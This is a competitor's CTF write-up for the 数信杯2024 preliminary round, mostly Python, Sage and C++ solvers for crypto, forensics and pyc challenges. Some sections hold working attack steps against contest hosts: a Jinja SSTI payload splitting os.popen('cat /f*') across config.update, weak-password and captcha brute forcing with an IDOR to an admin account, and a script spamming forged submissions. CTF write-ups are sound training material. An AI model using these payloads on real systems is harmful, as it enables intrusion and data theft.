数信杯2024初赛wp-yulin666

图片

西部赛区初赛第一名

定向数据采集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from faker import Faker 
def fak():
    fa = Faker(locale='zh-CN')
    return fa.ssn()
def datagen():
    idcard = fak()  # 确保fak()函数返回一个有效的身份证号码字符串
    if int(idcard[-2]) % 2 == 0:
        sex = '女'
    else:
        sex = '男'
    # 假设身份证号码中的年份是第7到10位
    age = 2024 - int(idcard[6:10])
    data = {
        "name": "我草",
        "sex": sex,  # 直接使用变量sex
        "age": str(age),  # 直接使用变量age
        "ethnicity": "汉族",
        "idcard": idcard,  # 直接使用变量idcard
        "phonenumber": "12392911923",
        "address": "啊实打实大时代大萨达",
        "position": "阿达撒大声地",
        "experience": "12"
    }
    return data

import requests

# 设置请求头部
headers = {
    'Host': '121.40.65.125:23930',
    'Content-Length': '212',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36',
    'Content-Type': 'application/json;charset=UTF-8',
    'Accept': '*/*',
    'Origin': 'http://121.40.65.125:23930',
    'Referer': 'http://121.40.65.125:23930/',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close',
}
for i in range(1200):
    data = datagen()

    # 设置POST请求的数据

    # 发送POST请求
    response = requests.post('http://121.40.65.125:23930/submit', headers=headers, json=data)
    # 打印响应
    if 'flag' in response.text:
        print(response.text)
        break

使用faker模块,等待浏览器弹出flag即可。

Cloudconsole

利用xray扫描

image-20240420195318549

打开xray,访问一会后发现自动登上后台了(弱口令爆破)。

image-20240420195343095

此时是测试账号,因此我们尝试访问账号界面ID=1,得到管理员手机号155666644。

img

验证码爆破1-9999,得到1234,访问找到flag

img

flag{Jih7RUPNQHcE6yEJxEXH}

Backpack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# 导入必要的SageMath库  
from sage.all import *  
  
# 原始数据  
S = 231282844744  
M = [  
    27811518167, 19889199464, 19122558731, 19966624823, 25670001067,  
    30690729665, 23936341812, 31011714749, 30524482330, 21737374993,  
    17530717152, 19140841231, 33846825616, 17334386491, 28867755886,  
    29354544582, 21758322019, 27261411361, 31465376167, 26145493792,  
    27075307455, 33514052206, 25397635665, 21970496142, 30801229475,  
    22405695620, 18486900933, 27071880304, 17919853256, 18072328152,  
    21108080920  
]  
  
# 构造增广矩阵(包含目标值S作为最后一列)  
A = Matrix(ZZ, len(M), len(M) + 1)  
for i in range(len(M)):  
    for j in range(len(M)):  
        if j == i:  
            A[i, j] = 2  # 单位矩阵的对角线元素设为2  
        else:  
            A[i, j] = 0  # 单位矩阵的非对角线元素设为0  
    A[i, len(M)] = M[i]  # 最后一列设置为M的元素  
A[len(M) - 1, len(M)] = S  # 最后一行的最后一个元素设置为S  
  
# 执行格基约减  
A_reduced = A.LLL()  # 使用LLL算法进行格基约减  
  
# 查找可能的解  
for row in A_reduced.rows():  
    # 检查行是否只包含-1, 0, 1  
    if all(x in [-1, 0, 1] for x in row):  
        # 提取解,忽略最后一列(即目标值S)  
        solution = [0 if x == 0 else (1 if x == 1 else -1) for x in row[:-1]]  
        print("Found solution:", solution)  
        break  # 假设只找到一个解就停止  
else:  
    print("No solution found.")  
  
# 如果你需要将整数解转换为字节  
def int_to_bytes(n):  
    return n.to_bytes((n.bit_length() + 7) // 8, byteorder='big')  
  
# 假设solution是一个整数列表,你可以这样转换  
# solution_bytes = [int_to_bytes(x) for x in solution]

1

Backpack_revenge

观看代码,进行多次交互后发现那个secrect的长度时固定的23,它这个是用三次的背包加密,给了加密的M和加密的结果。由于secrect长度还是很小,只有23,于是想着继续用那个c++爆破脚本,把里面的dfs改以下就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <bits/stdc++.h>
using namespace std;
typedef long long LL;
const LL maxn = 1e9+10,N=2*1e5+120,g=239,mod=1e9 + 7,cmod=998244353,INF=1e16;
int n,m,k,q;
LL M[]={685, 2019, 1262, 769, 630, 527, 1192, 1634, 1357, 661, 1164, 784, 2048, 2000, 1239, 1302, 1816, 1918, 1724, 1961, 1831, 1620, 732, 1756, 807, 875, 1940, 1095, 1702, 1514, 1651, 1206, 845, 869, 1638, 935, 1485, 1678, 1407, 696, 828, 841, 1058, 1167, 1478, 1582, 683, 1486, 1372, 1781, 671, 1564, 877, 565, 1519, 1449, 1773, 664, 1355, 1993, 843, 1332, 1943, 1931, 716, 635, 1863, 1271, 2019};
LL C[] =  {11881, 11491, 11114};
void dfs(int k,LL as1,LL as2,LL as3,LL z)
{
	if(as1==C[0]&&as2==C[1]&&as3==C[2])
			printf("%lld\n",z);
	if(k==23)
	{
		if(as1==C[0]&&as2==C[1]&&as3==C[2])
			printf("%lld\n",z);
		return;
	}
	if(as1>C[0]||as2>C[1]||as3>C[2]) return;
	
	dfs(k+1,as1+M[k],as2+M[k+23],as3+M[k+46],(z<<1)^1);
	dfs(k+1,as1,as2,as3,(z<<1));
	return;
}
int b[31];
int main()
{
	dfs(0,0,0,0,0);
	return 0;
}

同时两次交互来解密secret后发现每次解密出的secret都一样,判断secret是个常数,于是直接交这个secret=5000268

以下是交互脚本

1
2
3
4
5
6
7
8
from pwn import *
r=remote('121.40.65.125',29514)
print(r.recvline())
print(r.recvline())
print(r.recvline())
print(r.recvline())
r.sendline(b'5000268')
print(r.recvline())

结果为

flag{U9VFwHBY3tk46wM4zKav}

好小的公钥

看代码发现e很小,并且n未给出任何分解相关的有效信息,于是直接去facrordb网站上查询n,失败了。再然后发现两次c1,c2对应的m1,m2只有name有区别,且程序中给出了name的长度20,于是m1,m2只有连续160的比特回有区别。开始时试图分解出name1和name2,失败了。

于是转换思路试图求解出name1-name2,首先由于不知道name的具体所在位置,所以要爆破枚举name的所在位置。然后列出两个c1和c2的方程,

用结点消元法消去y,转变为x的单变量方程,由于x是一个160比特大小的数,分析发现x最高次是9,可以用铜匠攻击,求解出方程小根

直接调用small_roots方法求解出name1-name2

1
2
3
4
5
6
7
8
9
for i in range(3,512):
    f = (x*(2^(i*8))+y)^3-c2
    g = (y)^3-c1
    h = f.sylvester_matrix(g, y).det().univariate_polynomial().monic()
    #print(h)
    print(i)
    roots=h.small_roots(X=2^(160),beta=0.5)
    if len(roots)!=0:
        print(roots)

之后观察f,g这两个方程式存在公共根的,于是对这两个方程求gcd,再把得到的多项式化成y-C的形式(C是一个常数)

再转换C为bytes得到结果

1
2
3
4
5
6
7
f = (cs1*(2^(ilen*8))+y)^3-c2
g = (y)^3-c1
def gcd(ux,uy):
    while uy:
        ux,uy=uy,ux%uy
    return ux
print(gcd(f,g))

以下是完整代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
n = 568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136139831000566777869918466156880089327163065068626898059287985228258082737620000000279896747890757319085381631511173307825511583906098352616444664784639501033857651875619579526808372015544289449630825737736069734585631737164678002506101904757713885951128904172308749831239593270099962357714449828976184968093339746550743879291082640824342416614313080244013521184173978725567256679980140028608635479169401328634544278604752913220323603960576165670347499629983898810503372179588691930448790663301146315112753895278701851939171098189289426351907555872008321093595413542315030724511959094814066961512647863851936300847205610378379468461090776667809852896300095279643331141021965338494497059637030460612114103972724295296066218378878321083520263808122442805624484709678389194358767917969953786151907151113054612259390820206281236656103050308732275671876578046759831954611695137121364671140004360818977230200260012108474639126819289473259618493019534134103467249869746345593299925296296576270840411168887985994517056879751144774547
c1 = 431312103100767688301270873515694180462257583459908234203073002487325117493887047120595913906904515450437699824150951431203682143625472233283131484154340726407655916093919153094880725587387190657282541339852240866740558210935057304045622134333737364837907803284500720912477083278604674191761558055606257265613653371174413735704743368774112560256371957440166273363312892826954931938520339749763587237647531487364315671724711104121476132976721311150162435461040429472367051903062023684424445453470509770755251625919328562598684973145845411949679521293696654238536568271288227873235222254418381637988720403134737388969117301315129764877084098263887038702360875806169943329250942423481218879414262975949372263342542267307509991818876001663343080174068122745544889250468768262778036531643485618966462765400799197337845903384752263868544685704850009883890733780492467688079391036667616844591782969089061420721690202569906456519442030878032969214680094553153977362452465792210460969237703808838958554390073039156314586976508524382532218487645573442266610936598298297875467628751249793552304509948574237292979527475347029486469806949152294324189679630412632233400760461994879210062157065072372411916571806421837168282993333259037632027802003
c2 = 111326641811759493604088523562272731454464716671194755315328363821292903187271753249420574406026395878690499347562021194039381824656168455890425774471881313917884834279782521293520897666098947728412358720613339825800136298612478019319813893005212230183582102418424882679301752156049958975894273766026631862041748967780800417583410741108884715313323900093310792257441808867208196444135018606731846323195653209862566605010692791815067942002776912439607453059083583034027686629599715307795110352640886758030641410333262371457801139341561118922116406804672110476329045310692884716196591553487627768331568194031497995162292372362355335942016715203357198021060493558898566979718960008685572625090545387509936034791555171957700118277390090007172285832465740027830724861313089424939667978089316596191454429096123617934705475390965480354286330548814947931157769714442311818706252505465905591041180883235830012150614876110315563201395578841723561829534311600512174988418799061640259280069741788731955575782711935172179986077118656212700160367567297188194157963591548015377609501024174395290161373145148594887695593674066706818905384618972001711737840675693775981586009982344466167108444473750394255025928855839837371545436570899099865485704861
P.< x, y > = PolynomialRing(Zmod(n))
x, y = P.gens()
f1=(x+y)^3
f2=(y)^3
#c1=f1(2^170,2^1024+1)
#c2=f2(0,2^1024+1)
print(2^170)
cs=568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136139831000566777869918466156880089327163065068626898059287985228258082737620000000279896747890757319085381631511173307825511583906098352616444664784639501033857651875619579526808372015544289449630825737736069734585631737164678002506101904757713885951128904172308749831239593270099962357714449828976184968093339746550743879291082640824342416614313080244013521184173978725567256679980140028608635479169401328634544278604752913220323603960576165670347499629983898810503372179588691930448790663301146315112753895278701851939171098189289426351907555872008321093595413542315030724511959094814066961512647863851936300847205610378379468461090776667809852896300095279643331141021965338494497059637030460612114103972724295296066218378878321083520263808122442805624484709678389194358767917969953786151907151113054612259390820206281236656103050308732275671876578046759831954611695137121364671140004360818977230200260012108474639126819289473259618493019534134103467249869746345593299925296274073696996381973296121109312481072817280748704
cs1=22502573844029195591864885204575806933864025843
ilen=401
'''
for i in range(3,512):
    f = (x*(2^(i*8))+y)^3-c2
    g = (y)^3-c1
    h = f.sylvester_matrix(g, y).det().univariate_polynomial().monic()
    #print(h)
    print(i)
    roots=h.small_roots(X=2^(160),beta=0.5)
    if len(roots)!=0:
        print(roots)
'''

f = (cs1*(2^(ilen*8))+y)^3-c2
g = (y)^3-c1
def gcd(ux,uy):
    while uy:
        ux,uy=uy,ux%uy
    return ux
print(gcd(f,g))
xs=75912276473669370492298543347489880882773184257255675346190757278499807262137750152580304830223847787218142856869420597971534775471907679278040934206557685373184266313381208309068838212838502311538830720988831533214248668824198103758646468141425377684473018941153132570437817730031044736601406029756057895378290209666927514287545305811245434020201363496043921922552321321126173021212450829031458685397581502464841897657009193822066907904684339567048411893205561557592977890167095203746880001363613413161762486225378900275078831684881550125418710637157317902134382771991649241897758050208635097455945624610479238760215459249788713237230939641234367985660885344708381298766463738210528110849089495838322027724918453000449420935494688171096708547375568470761643778949127956491347135215910114064088683866498270442573042009097594149341693488160937694041585415781751211830583548152317931753421463175521121102522187877611512662866409081438494276393480651283300762883391326604411207285122908490316872263401272946127097988275496547977580302678315505248789471022905739897255329480907640672240470969826076822070363607205528100519325442252558602480189485785203746417911685302044470866623664245347676765090437304521368252757713621825087005564745*y + 249232217447088470017517108532603127647764257231000945606085312343234346642887365573442281891869769573193103809755295005726512948757236723602454366353511322552078203027626328672305530936471332104632068874639021398521141789822008410100566592052144344486764112549833834277894475216405534618656813055976695234344939793969826767235805703568281467044597504160229853401409155512262288680012947215577931092260083233508796579091976557540249899478018883690697564923485431460667780393001915193375256503503266661591463436753250455175675443472187207664310828013636954735651610659845300464092447549538010651864118369569643385989028285347684532913171184569598522190650832934939889916673796900283686359627961384997454512932208052324830350287129526552464117306919240730692089198552066151648221281139803059921708054245746722477829012007595944346291809326829061589655388120563852888555191506731646365114387914597282226318925565157964489075260040098871199811850010522652705956032546776166705080580225160655649392437968020952027410597067308517954169176021203342485946036066103258811091183560926704740999740310353512576181269562376008687822036728706979881848612778922653363446106218734485474774034508565328665848013661791639232681913537490241624318983744


cm=75912276473669370492298543347489880882773184257255675346190757278499807262137750152580304830223847787218142856869420597971534775471907679278040934206557685373184266313381208309068838212838502311538830720988831533214248668824198103758646468141425377684473018941153132570437817730031044736601406029756057895378290209666927514287545305811245434020201363496043921922552321321126173021212450829031458685397581502464841897657009193822066907904684339567048411893205561557592977890167095203746880001363613413161762486225378900275078831684881550125418710637157317902134382771991649241897758050208635097455945624610479238760215459249788713237230939641234367985660885344708381298766463738210528110849089495838322027724918453000449420935494688171096708547375568470761643778949127956491347135215910114064088683866498270442573042009097594149341693488160937694041585415781751211830583548152317931753421463175521121102522187877611512662866409081438494276393480651283300762883391326604411207285122908490316872263401272946127097988275496547977580302678315505248789471022905739897255329480907640672240470969826076822070363607205528100519325442252558602480189485785203746417911685302044470866623664245347676765090437304521368252757713621825087005564745
import gmpy2 as gp
xs*=inverse_mod(cm,n)
print(xs)
xs2=568815889468429672903921218851807349590640095687666536580402147083537697728110722563341811783241422008294913820504022599610230857183013487209918498980050317505167030117660343476640876573256105556195811570103136136320995282543074035456056821931776470915459802161035016774910328986323340064723823601358191192724326897349341597000502102018631267199460843264681292311278559465587545719505802671193017964123780363464984077169577833257842589087942545276588392897000332340550822498650429085280357344996478980952876619349606741147197410253135312645035706822347924220099206191876612630068512879551466747348560267800605986697904702251260531364811486554500270930656471997860752246468793935111330200606840355795453673113970438981705435468450471884398372219505972709294983913670835986800227446394410918642907986850955958428639639813925170880382756290935355535155879203798768953032780036589159992638959383219122749581355954232065366797744698220209644443749723244099427237525488376104293995954432591882841220426836527029117318470886992558897709256375615937928900838071657874723813335223008696832349205866902136097335625642357536470120937486648558982174937790178247148170436277149203031706385440784727319730858994878198282598771650570593052976558642
print(long_to_bytes(int(xs2)))
print(long_to_bytes(int(n-xs2)))
print('ok')
1
flag{oirh398ryhw9iufs3}

Prime Conundrum

题中很明显存在多个小量s,t,delta,考虑格攻击

有等式

sP+tQ+delta+k*n=leak

题目给出P,Q, n, leak,分析s,t,delta,k都是一个小量,于是直接造格,来获取。

有以下关系,同时在最后一列配上大系数X,保证规约出0

代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
P = 91307300383014465303389363075431698588933838431961163766796972428733255940234665671679789435258337578396879726483195947952476118985507696067550566875810703327064257916213956673893327976728584687137639337961422903593701591152074826447530099276756806166361533554689114264018344629905535188048343259754284652017
Q = 149089411480331249267443825847904508235946280550542428853480950085018092182435890098430254117786823782088885695848943795846175490059759543848516828825072642481794902650586147465149175976488985613001468444893241645390860978312924241181340390543064512602477917112031391367608345501790785857442379515898677467337
n = 97339579366356507946846401691835843338581994635020856947574389213640653953117584127557153363761256108433474475102197685296591968229050609482457622390855692102761025647645801250282912327521623082583744902369819132264725498938021235699466656447009532567358416017236962637028458839659218745744825556065623673913
N = 72077628115206161977315177371814064093288033362281459918751639032623658967593542855291047617938064177930014574391486973767462937337649946356572406647109942552336519343063401327708412361664750917582404375485334706345485264831286788789648126355202140531434534406410829696252616051882952860015344370516517084357909896281965899571934196572691
leak = 45439323369250400352006541741265096780554398472451037280607564706700682873365442581062404781075514235328183754475227917775810587457541607767765455164339314322631781126065808432845447798024685402323868389611285038950397054020330610558058133599416135943335731904873776868614834960217751934513462319743149481906
c = 31456530156035981140909630437789986968079386074106871160743980387785993275753486380185420818239283975922682050323918081691381897642776414263991442096807392948925867761878299044300335666219533277719472330029607869735373712681522022301659090108633692457216985013550482473362675907949633024047291607542103649091410575340884845190483766424507
hint = 13318665442465244206832303588726230530847297247590371628366697082014350966833522479782161994817212671730145702818662148370306660550486536176566012104254910
mar=matrix(ZZ,[[0 for i in range(5)]for j in range(5)])
X=2^1024
for i in range(4):
    mar[i,i]=1
mar[4,4]=-leak*X
mar[3,4]=n*X
mar[2,4]=1*X
mar[1,4]=Q*X
mar[0,4]=P*X
print(mar.LLL()[0])
s,t,delta,k,z=mar.LLL()[0]
p=hint+s
q=n//p
print(p*q==n)
e = 65537
phi=(p-1)*(q-1)*(delta-1)
d=inverse(e,phi)
m=pow(c,d,N)
print(long_to_bytes(int(m)))
1
flag{499959682502a9ee664412774d995c85}

消逝的曲线

本题就是给了四个点。于是有四个在模p中的方程,椭圆曲线方程 y^2=x^3+a*x+b

有四个方程

$y1^2=x1^3 +a*x1+b \quad(mod\quad p)$

$y2^2=x2^3 +a*x2+b\quad (mod \quad p)$

$y3^2=x3^3 +a*x3+b\quad (mod\quad p)$

$y4^2=x4^3 +a*x4+b\quad (mod\quad p)$

消除b的影响,有三个方程

$y1^2 - y2^2=x1^3 -x2^3+a*(x1-x2) \quad(mod\quad p)$

$y2^2 - y3^2=x2^3 -x3^3+a*(x2-x3)\quad (mod\quad p)$

$y3^2 - y4^2=x3^3 -x4^3+a*(x3-x4)\quad (mod\quad p)$

再消除a的影响,有两个方程

$(x2-x3)(y1^2-y2^2)-(x2-x3)(x1^3-x2^3)-(x1-x2)((y2^2-y3^2)-(x2^3-x3^3))=0 \quad(mod\quad p)$

$(x2-x3)(y3^2-y4^2)-(x2-x3)(x3^3-x4^3)-(x3-x4)((y2^2-y3^2)-(x2^3-x3^3))=0\quad(mod\quad p)$

代入求值,再gcd得到kp,再扔进yafu里分解得到p

然后列出原始四个方程,用groebner解出a,b

最后flag的形式应为flag='flag{' + hashlib.sha256(str( (a+b+p)%p ).encode()).hexdigest() +'}'

代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
x1,y1=326672433563808078860194887521653547089556740597 , 184497841037716044508112339838233572527979342579
x2,y2=946940648888016429117035739241938283924071224831 , 321676290528200789029428639046110268747006565356
x3,y3=466606422274774582389917703171293585058211734594 , 1074845338842713759215696692888593660449409944456
x4,y4=800969026528232354813204405831803185648593796532 ,716443765574481260039522236141448382825732855234
f1=(x2-x3)*(y1^2-y2^2)-(x2-x3)*(x1^3-x2^3)-(x1-x2)*((y2^2-y3^2)-(x2^3-x3^3))
f2=(x2-x3)*(y3^2-y4^2)-(x2-x3)*(x3^3-x4^3)-(x3-x4)*((y2^2-y3^2)-(x2^3-x3^3))
print(gcd(f1,f2))
p=abs(gcd(f1,f2))
from Crypto.Util.number import isPrime
p=   1147718459924575949776230905228771300694578329241
print(abs(gcd(f1,f2))//11==p)
print(isPrime(int(p)))
F = []
PR.<a,b> = PolynomialRing(Zmod(p))
f=y1^2-(x1^3+a*x1+b)
F.append(f)
f=y2^2-(x2^3+a*x2+b)
F.append(f)
f=y3^2-(x3^3+a*x3+b)
F.append(f)
f=y4^2-(x4^3+a*x4+b)
F.append(f)
res = Ideal(F).groebner_basis()
print(res)
a=p-562057997528662832671979630483769294719057055570
b=p-767226941590139107595679281744178365913055475754
print(f'a={a}')
print(f'b={b}')
print(f'p={p}')
print(y1^2%p==(x1^3+a*x1+b)%p)
print(y2^2%p==(x2^3+a*x2+b)%p)
print(y4^2%p==(x4^3+a*x4+b)%p)
import hashlib
print(int(a)+int(b)+int(p))
print((int(a)+int(b)+int(p))%p)
flag='flag{' + hashlib.sha256(str(int(a)+int(b)+int(p)).encode()).hexdigest() +'}'
print(flag)
print('flag{'+hashlib.sha256(str(int(966151980730349959284802898229594940757044127158)).encode()).hexdigest()+'}')
print('flag{'+hashlib.sha256(str(int(2113870440654925909061033803458366241451622456399)).encode()).hexdigest()+'}')

flag{b785a320839a4a51dc206d2ee72ebb2b9039dbed06b43c7c6164a3ce0151eb7b}

幻方

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
import hashlib
import itertools
from string import digits, ascii_letters, punctuation
from pwn import *
from z3 import Int, Solver

context.log_level = 'debug'

def sha(tail, sha256):
    alpha_bet=digits+ascii_letters+punctuation
    strlist = itertools.product(alpha_bet, repeat=4)

    xxxx=''

    for i in strlist:
        data=i[0]+i[1]+i[2]+i[3]
        data_sha=hashlib.sha256((data+tail).encode('utf-8')).hexdigest()
        if data_sha==sha256:
            xxxx=data
            break

    return xxxx.encode('utf-8')

def solve(arr):
    count = 0
    for i in range(3):
        for j in range(3):
            if arr[i][j] == 'X':
                count += 1
            else:
                arr[i][j] = int(arr[i][j])
    ans = [Int(f'ans[{i}]') for i in range(count)]
    tmp = 0
    for i in range(3):
        for j in range(3):
            if arr[i][j] == 'X':
                arr[i][j] = ans[tmp]
                tmp += 1
    s = Solver()

    s.add(arr[0][0] + arr[0][1] + arr[0][2] == arr[1][0] + arr[1][1] + arr[1][2])
    s.add(arr[1][0] + arr[1][1] + arr[1][2] == arr[2][0] + arr[2][1] + arr[2][2])
    s.add(arr[0][0] + arr[1][0] + arr[2][0] == arr[0][1] + arr[1][1] + arr[2][1])
    s.add(arr[0][1] + arr[1][1] + arr[2][1] == arr[0][2] + arr[1][2] + arr[2][2])
    s.add(arr[0][0] + arr[1][1] + arr[2][2] == arr[0][2] + arr[1][1] + arr[2][0])
    print(arr)

    if s.check():
        m = s.model()
        count = 0
        for i in range(3):
            for j in range(3):
                if type(arr[i][j]) == int:
                    continue
                arr[i][j] = m[ans[count]].as_long()
                count += 1

    print(arr)
    res = f"{arr[0][0]} {arr[0][1]} {arr[0][2]}\n{arr[1][0]} {arr[1][1]} {arr[1][2]}\n{arr[2][0]} {arr[2][1]} {arr[2][2]}\n"
    return res

r = remote('121.40.65.125', 29175)
s = r.recvline().decode('utf-8').replace('\n', '').replace('[+] sha256(XXXX+', '')
slist = s.split(') == ')
xxxx = sha(slist[0], slist[1])

r.recvuntil(b'[+] Plz tell me XXXX: ')
r.sendline(xxxx)

r.recvline()
l1 = r.recvline().decode('utf-8').replace('\n', '').split(' ')
l2 = r.recvline().decode('utf-8').replace('\n', '').split(' ')
l3 = r.recvline().decode('utf-8').replace('\n', '').split(' ')
arr = []
arr.append(l1)
arr.append(l2)
arr.append(l3)

magic = solve(arr)
r.sendline(magic)

r.interactive()

2

MWatch

观察流量包发现是手环和手机的蓝牙流量,查看所有ATT协议,发现存在heart_rate_measurement关键词,直接过滤一下查看最大的即可。

1
2
# 过滤条件: btatt.heart_rate_measurement.value.8
# flag: Mi Smart Band 5_Redmi K40_128

4

cloudplat

app.py源码中泄露了登录用户名和密码,登录后存在SSTI模板注入,由于areaid字段的长度都不能超过20,因此将payload拆开来,利用config.update来在config全局对象中分段保存payload

1
2
{{config.update(u=lipsum.__globals__)}}
{{config.u.os.popen('cat /f*').read()}}

img

Baby_RSA

由于q的值并不大,因此可以通过枚举q来逆推出n,从而求解m

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# from secret import flag,init
from Crypto.Util.number import *
# from sage.all import *
from gmpy2 import *
# m = bytes_to_long(flag.encode())
# r = getPrime(128)

# p = init
# # for i in range(r-1):
# #     p += next_prime(init)

# # assert iroot(p,3)[1] == 1
# q = getPrime(12)
# # N = p*q*r
# N = r**4*q
# e = getPrime(17)
# c = pow(m,e,N)
# print(f"r = {r}")
# print(f"e = {e}")
# print(f"c = {c}")


r = 287040188443069778047400125757341514899
e = 96001
c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625

for i in range(1000,5000):
        if isPrime(i):
                phi = (r-1)*r*r*r*(i-1)
                d = invert(e, phi)
                m = pow(c, d, r**4*i)
                if b'flag' in long_to_bytes(m):
                        print(long_to_bytes(m))
                        exit(0)


# r = 287040188443069778047400125757341514899
# e = 96001
# c = 7385580281056276781497978538020227181009675544528771975750499295104237912389096731847571930273208146186326124578668216163319969575131936068848815308298035625

img

fun

图片中给了xyz三个参数的限制条件,因为构建Z3表达式来求解所有可能得组合,得到随机数种子,从而计算KEY,反解被加密文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from z3 import *
from Crypto.Cipher import AES
import random

# 创建整数变量x, y, z
x, y, z = BitVecs('x y z', 32)

# 创建求解器
s = Solver()

# 添加约束条件
s.add(0 <= x, x <= 100)  # 0<=x<=100
s.add(0 <= y, y <= 100)  # 0<=y<=100
s.add(0 <= z, z <= 100)  # 0<=z<=100
s.add(x * y != z)  # x*y不等于z
s.add(x ^ y == z)
s.add((x + y) * z == x * x + y * y)  # (x+y)*z=x^2+y^2
s.add(x != y)  # x不等于y

# 获得所有可行解
while s.check() == sat:
    f=s.model()
    s.add(Or(x != s.model()[x], y != s.model()[y], z != s.model()[z]))
    rx=f[x].as_long()
    ry=f[y].as_long()
    rz=f[z].as_long()
    random.seed(rx+ry+rz)
    key = random.randbytes(16)

    PATH = "encrypted_flag.bin"
    with open(PATH, "rb") as file_in:
        nonce = file_in.read(16)
        tag = file_in.read(16)
        ciphertext = file_in.read()

    cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)

    # 解密密文
    data = cipher.decrypt_and_verify(ciphertext, tag)

    print("The flag is:", data)

9

messagebox

xss钓鱼,打textareapayload

img

pyc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
uncompyle6 -o 1.py secret.pyc 
import random

def decrypt_file(encrypted_file_path):
    random.seed(114514)  # 使用相同的种子以获得相同的随机数序列
    with open(encrypted_file_path, "rb") as encrypted_file:
        encrypted_data = encrypted_file.read()
    decrypted_data = b''
    for byte in encrypted_data:
        key = random.randint(0, 128)
        decrypted_data += chr(byte ^ key).encode()
    decrypted_file_path = encrypted_file_path.replace(".enc", ".dec")
    with open(decrypted_file_path, "wb") as decrypted_file:
        decrypted_file.write(decrypted_data)
    return decrypted_file_path
decrypted_file_path = decrypt_file("flag.enc")
print(f"Decrypted file saved as: {decrypted_file_path}")%   

# flag{U_R_g00d_at_do1n_pyc}